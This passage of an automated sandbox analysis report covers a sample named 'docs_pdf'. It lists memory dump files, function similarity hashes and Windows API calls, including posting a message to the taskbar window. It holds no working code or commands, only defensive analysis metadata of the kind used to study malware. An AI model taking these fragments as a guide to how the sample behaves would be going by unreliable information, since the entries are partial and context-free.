                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
                                                            • Instruction ID: 4b1242564ec4dc36b11bd7b5c5d0a8762cf6abc01d280fac8fdff36d2dd2c8d0
                                                            • Opcode Fuzzy Hash: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
                                                            • Instruction Fuzzy Hash: 6BE06D706043208FD721DF28F9443827BE0BF14704F04892DE446CAA51DBB8D884CBA1
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00175BF5
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00175C08
                                                              • Part of subcall function 001554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: caa1107277266bee7c081c4c9a0f377a9ee7b472ba2f2fdc9afd5b03fc0130cd
                                                            • Instruction ID: f086cac8c92864382df2cbcb98ef0f9b99e0aaf07a2cb1ec54e29d7fe4bcbbd6
                                                            • Opcode Fuzzy Hash: caa1107277266bee7c081c4c9a0f377a9ee7b472ba2f2fdc9afd5b03fc0130cd
                                                            • Instruction Fuzzy Hash: 9CD0C935388311BAE764BB70EC1BFD76A24AB15B51F000829B659AA1D0DAE45881C650